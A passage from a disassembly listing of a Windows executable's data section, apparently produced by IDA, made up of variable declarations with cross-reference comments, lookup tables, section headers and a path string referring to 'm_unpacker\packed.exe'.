; sub_407D3E+1DA�r
dword_4C47C4 dd 0 ; DATA XREF: sub_407D3E+AEE�w
; sub_407D3E+B0F�r
dword_4C47C8 dd 0 ; DATA XREF: sub_406231+49�r
; sub_407D3E+339�w ...
dword_4C47CC dd 0 ; DATA XREF: sub_407D3E+38B�w
; sub_407D3E+3E0�r
dword_4C47D0 dd 0 ; DATA XREF: sub_407D3E+465�w
; sub_407D3E+4C7�r
dword_4C47D4 dd 0 ; DATA XREF: sub_407D3E+831�w
; sub_407D3E+89C�r
dword_4C47D8 dd 0 ; DATA XREF: sub_407D3E+817�w
; sub_407D3E+88C�r ...
dword_4C47DC dd 0 ; DATA XREF: sub_4077DC+4B�r
; sub_407D3E+5E6�w ...
dword_4C47E0 dd 0 ; DATA XREF: sub_40198E+11D9�r
; sub_406231+61�r ...
dword_4C47E4 dd 0 ; DATA XREF: sub_407D3E:loc_407E3C�w
; sub_407D3E+12B�w
dword_4C47E8 dd 0 ; DATA XREF: sub_407D3E+126�w
dword_4C47EC dd 0 ; DATA XREF: sub_407D3E:loc_407F2C�w
; sub_407D3E:loc_407F93�w
dword_4C47F0 dd 0 ; DATA XREF: sub_407D3E+250�w
dword_4C47F4 dd 0 ; DATA XREF: sub_407D3E:loc_40805F�w
; sub_407D3E:loc_4080A4�w ...
dword_4C47F8 dd 0 ; DATA XREF: sub_407D3E+437�w
dword_4C47FC dd 0 ; DATA XREF: sub_407D3E:loc_40825B�w
dword_4C4800 dd 0 ; DATA XREF: sub_407D3E+518�w
dword_4C4804 dd 0 ; DATA XREF: sub_407D3E:loc_408515�w
; sub_407D3E+8FD�w
dword_4C4808 dd 0 ; DATA XREF: sub_407D3E+8F8�w
dword_4C480C dd 0 ; DATA XREF: sub_407D3E:loc_40860A�w
; sub_407D3E+913�w
dword_4C4810 dd 0 ; DATA XREF: sub_407D3E+90E�w
dword_4C4814 dd 0 ; DATA XREF: sub_407D3E:loc_408762�w
dword_4C4818 dd 0 ; DATA XREF: sub_407D3E+A1F�w
dword_4C481C dd 0 ; DATA XREF: sub_407D3E:loc_4087AC�w
dword_4C4820 dd 0 ; DATA XREF: sub_407D3E+A69�w
dword_4C4824 dd 0 ; DATA XREF: sub_407D3E:loc_4087F6�w
dword_4C4828 dd 0 ; DATA XREF: sub_407D3E+AB3�w
dword_4C482C dd 0 ; DATA XREF: sub_407D3E:loc_40886A�w
dword_4C4830 dd 0 ; DATA XREF: sub_407D3E+B27�w
dword_4C4834 dd 0 ; DATA XREF: sub_407D3E:loc_4088B4�w
dword_4C4838 dd 0 ; DATA XREF: sub_407D3E+B71�w
dword_4C483C dd 0 ; DATA XREF: sub_407D3E:loc_408952�w
dword_4C4840 dd 0 ; DATA XREF: sub_407D3E+C0F�w
dd 2 dup(0)
dword_4C484C dd 0 ; DATA XREF: sub_407D3E:loc_407FCA�w
dword_4C4850 dd 0 ; DATA XREF: sub_407D3E+287�w
dword_4C4854 dd 4 dup(0) ; DATA XREF: sub_408CE6+46�o
dword_4C4864 dd 0 ; DATA XREF: sub_40A082+4�w
; sub_40A082+9�o
dword_4C4868 dd 0Eh dup(0) ; DATA XREF: sub_40A5BD+40�o
dword_4C48A0 dd 0 ; DATA XREF: sub_40AC56+92�w
; sub_40AFA2+36�w ...
dword_4C48A4 dd 0 ; DATA XREF: sub_40AD8F+1F5�r
; sub_40AFA2+BB�w ...
dd 3FEh dup(0)
dword_4C58A0 dd 6 dup(0) ; DATA XREF: sub_40AD8F+C0�o
; sub_40AD8F+127�o ...
dword_4C58B8 dd 0 ; DATA XREF: sub_40B1D5+31�r
; sub_40B31C+EA�r ...
dword_4C58BC dd 11h dup(0) ; DATA XREF: sub_40BFB5+66�o
dword_4C5900 dd 0 ; DATA XREF: sub_4106EF�w
; sub_412C19+14C�w
dword_4C5904 dd 0 ; DATA XREF: sub_40E8BA+9�w
; sub_40ED7A:loc_40EDF8�w ...
dword_4C5908 dd 0 ; DATA XREF: sub_41050F+96�w
; sub_41050F:loc_4106D6�w ...
dword_4C590C dd 0 ; DATA XREF: sub_415B4C+149�r
dword_4C5910 dd 2 ; DATA XREF: .text:0040F87B�w
; sub_412011�r ...
dword_4C5914 dd 0A28h ; DATA XREF: .text:0040F89B�w
; .text:0040F8AC�w
dword_4C5918 dd 501h ; DATA XREF: .text:0040F8B7�w
dword_4C591C dd 5 ; DATA XREF: .text:0040F884�w
; sub_412011+9�r ...
dword_4C5920 dd 1 ; DATA XREF: .text:0040F88C�w
dword_4C5924 dd 1 ; DATA XREF: sub_404BAB+2A3�r
; sub_404BAB:loc_404F4C�r ...
dword_4C5928 dd 900B20h ; DATA XREF: sub_404BAB+2AC�r
; sub_404BAB+2C8�r ...
align 10h
dword_4C5930 dd 900B40h ; DATA XREF: sub_41483C+48�w
; sub_41483C:loc_4148ED�r ...
align 10h
off_4C5940 dd offset aCM_unpackerPac ; DATA XREF: sub_414A6F+37�w
; "C:\\m_unpacker\\packed.exe"
align 8
byte_4C5948 db 0 ; DATA XREF: sub_40DB61+5�r
; sub_40DDA2+2D�w
align 4
dword_4C594C dd 0 ; DATA XREF: sub_40DDA2+27�w
dword_4C5950 dd 0 ; DATA XREF: sub_40DDA2+7�r
; sub_40DDA2+B0�w
dword_4C5954 dd 0 ; DATA XREF: sub_40E1DE+46�r
; sub_40E1DE+A5�w
dd 0
dword_4C595C dd 0 ; DATA XREF: sub_40E2CA+A�w
dword_4C5960 dd 0 ; DATA XREF: sub_40EFD6+A�r
; sub_40EFD6+13�w ...
dword_4C5964 dd 0 ; DATA XREF: .text:0040F96E�w
; sub_41483C:loc_41484E�r ...
dd 0
dword_4C596C dd 0 ; DATA XREF: sub_40F82D�r
; .text:0040F924�r ...
dword_4C5970 dd 1 ; DATA XREF: sub_411824+1C�w
; sub_411824+24�w ...
dword_4C5974 dd 0 ; DATA XREF: sub_411CCB+12�r
; sub_411DBE+1A�r ...
byte_4C5978 db 0 ; DATA XREF: sub_411CCB+3�r
; sub_411CCB+8F�r ...
align 4
dword_4C597C dd 0 ; DATA XREF: sub_411DBE+11�r
; sub_411E9B+1A�w ...
byte_4C5980 db 0 ; DATA XREF: sub_411E9B+57�w
align 4
dword_4C5984 dd 0 ; DATA XREF: sub_412B9F�r
dword_4C5988 dd 0 ; DATA XREF: sub_40E74F�r
; sub_410733:loc_410786�r ...
dword_4C598C dd 1 ; DATA XREF: sub_412ED1+E�r
; sub_412ED1+31�w ...
dd 2 dup(0)
dword_4C5998 dd 0 ; DATA XREF: sub_40EB9E+5�r
; sub_40EB9E+98�r ...
dd 3 dup(0)
dword_4C59A8 dd 0 ; DATA XREF: sub_40EB9E+86�r
; sub_411824+52�r ...
align 10h
dword_4C59B0 dd 0 ; DATA XREF: sub_41382B+32�r
; sub_41382B+42�w ...
dword_4C59B4 dd 0 ; DATA XREF: sub_41382B+3A�r
; sub_41382B+4B�w ...
dword_4C59B8 dd 0 ; DATA XREF: sub_4136F3:loc_413700�w
; sub_41370C+15�w ...
dword_4C59BC dd 0 ; DATA XREF: sub_40F094+75�r
; sub_413BA4+14�r
dword_4C59C0 dd 0 ; DATA XREF: sub_413EDF+C�r
dword_4C59C4 dd 0 ; DATA XREF: sub_41437B:loc_41439E�r
; sub_41437B+38�r ...
dword_4C59C8 dd 0 ; DATA XREF: sub_414629+21�r
dword_4C59CC dd 0 ; DATA XREF: sub_414662+68�r
; sub_414662+73�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_414A6F+23�o
; .text:off_4C5940�o
align 4
dd 3Ah dup(0)
byte_4C5AD4 db 0 ; DATA XREF: sub_414A6F:loc_414A86�w
align 4
dword_4C5AD8 dd 1 ; DATA XREF: sub_414B11+2�r
; sub_414B11+24�w ...
dword_4C5ADC dd 1 ; DATA XREF: sub_41512C+E�r
; sub_41512C+2E�w ...
dword_4C5AE0 dd 0 ; DATA XREF: sub_41533C+1A�r
word_4C5AE4 dw 0 ; DATA XREF: sub_415961+22�o
; sub_415961+53�r
byte_4C5AE6 db 0 ; DATA XREF: sub_415961+47�r
align 4
dword_4C5AE8 dd 6 dup(0) ; DATA XREF: sub_415961+62�o
dword_4C5B00 dd 0 ; DATA XREF: sub_415961+4E�w
; sub_415961+6C�o
dword_4C5B04 dd 0 ; DATA XREF: sub_415961+5A�w
dword_4C5B08 dd 0 ; DATA XREF: sub_415961+42�w
dword_4C5B0C dd 0 ; DATA XREF: sub_415961+62�w
dword_4C5B10 dd 0 ; DATA XREF: sub_412C19+7�r
dword_4C5B14 dd 0 ; DATA XREF: sub_416BBC+9�r
; sub_416BBC+38�w ...
dword_4C5B18 dd 0 ; DATA XREF: sub_416BBC+4D�w
; sub_416BBC:loc_416C81�r
dword_4C5B1C dd 0 ; DATA XREF: sub_416BBC+5B�w
; sub_416BBC+D6�r
dword_4C5B20 dd 0 ; DATA XREF: sub_416BBC+7B�w
; sub_416BBC:loc_416C3C�r
dword_4C5B24 dd 0 ; DATA XREF: sub_416BBC+6C�w
; sub_416BBC+9C�r
dword_4C5B28 dd 0 ; DATA XREF: sub_415B4C+3D�r
dword_4C5B2C dd 0 ; DATA XREF: sub_41784C:loc_4178B2�r
; sub_41784C+6C�o
dword_4C5B30 dd 0 ; DATA XREF: sub_41784C:loc_41788A�r
; sub_41784C+44�o
dword_4C5B34 dd 0 ; DATA XREF: sub_41784C:loc_41787D�r
; sub_41784C+37�o
dword_4C5B38 dd 0 ; DATA XREF: sub_41784C:loc_417897�r
; sub_41784C+51�o
align 10h
dword_4C5B40 dd 0 ; DATA XREF: sub_40F5A0�r sub_40F710�r ...
dword_4C5B44 dd 0 ; DATA XREF: sub_414253+26�w
; sub_414253+46�w
dword_4C5B48 dd 0 ; DATA XREF: sub_41207C+21�w
; sub_4120EF+21C�r ...
dword_4C5B4C dd 0 ; DATA XREF: sub_41207C+28�w
; sub_4120C4�r ...
dword_4C5B50 dd 0 ; DATA XREF: sub_41207C+15�w
; sub_4120C4+8�r ...
dword_4C5B54 dd 0 ; DATA XREF: sub_40E6DD+E�r
; sub_410733+29�r ...
dword_4C5B58 dd 0 ; DATA XREF: sub_41207C+2F�w
; sub_4120EF+300�w ...
dword_4C5B5C dd 0 ; DATA XREF: sub_41207C+3C�w
; sub_412407+5�r ...
dword_4C5B60 dd 0 ; DATA XREF: sub_4120EF+229�r
; sub_4120EF+249�r ...
dword_4C5B64 dd 900000h ; DATA XREF: sub_40E359+2A�r
; sub_40E6DD+38�r ...
dword_4C5B68 dd 1 ; DATA XREF: sub_40E359+9�r sub_40E6DD�r ...
dword_4C5B6C dd 0 ; DATA XREF: sub_411669+1A�w
; sub_411692+87�r ...
dword_4C5B70 dd 0 ; DATA XREF: sub_411669+15�w
; sub_411824+150�w ...
align 10h
byte_4C5B80 db 0 ; DATA XREF: sub_411669+6�o
; sub_411824+AA�o ...
byte_4C5B81 db 0 ; DATA XREF: sub_40DEA4+5E�r
; sub_411692+107�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_4C5C84 dd 4E4h ; DATA XREF: sub_411669+10�w
; sub_411692+19�r ...
align 10h
dword_4C5C90 dd 4 dup(0) ; DATA XREF: sub_411669+1F�o
; sub_411824+165�o ...
byte_4C5CA0 db 0 ; DATA XREF: sub_411692:loc_4117A7�w
; sub_411692:loc_4117C4�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_4C5DA0 dd 20h ; DATA XREF: sub_410364+1F�w
; sub_410364:loc_4103ED�r ...
dd 7 dup(0)
dword_4C5DC0 dd 900650h ; DATA XREF: sub_40D9DD+74�r
; sub_40DABB+7B�r ...
dword_4C5DC4 dd 3Fh dup(0) ; DATA XREF: sub_410364+91�o
dword_4C5EC0 dd 142340h ; DATA XREF: .text:0040F964�w
; sub_4147D3+F�r ...
dword_4C5EC4 dd 1 ; DATA XREF: sub_41483C+9F�w
dword_4C5EC8 dd 0 ; DATA XREF: sub_40DDA2+3E�r
; sub_40DDA2:loc_40DDF4�r ...
dword_4C5ECC dd 0 ; DATA XREF: sub_40DDA2+34�r
; sub_40DDA2+5A�r ...
dword_4C5ED0 dd 1 ; DATA XREF: sub_411A10�r
; sub_411A10+11�w ...
dword_4C5ED4 dd 0 ; DATA XREF: sub_40DABB+2B�w
; sub_40DABB+44�w ...
align 10h
dword_4C5EE0 dd 400h dup(0) ; DATA XREF: .text:off_420F80�o
; .text:00420F88�o
dword_4C6EE0 dd 0 ; DATA XREF: sub_40DABB�r
; sub_40DABB:loc_40DAD5�w ...
align 200h
_text ends
; Section 3. (virtual address 000C8000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 000C8000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4C8000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start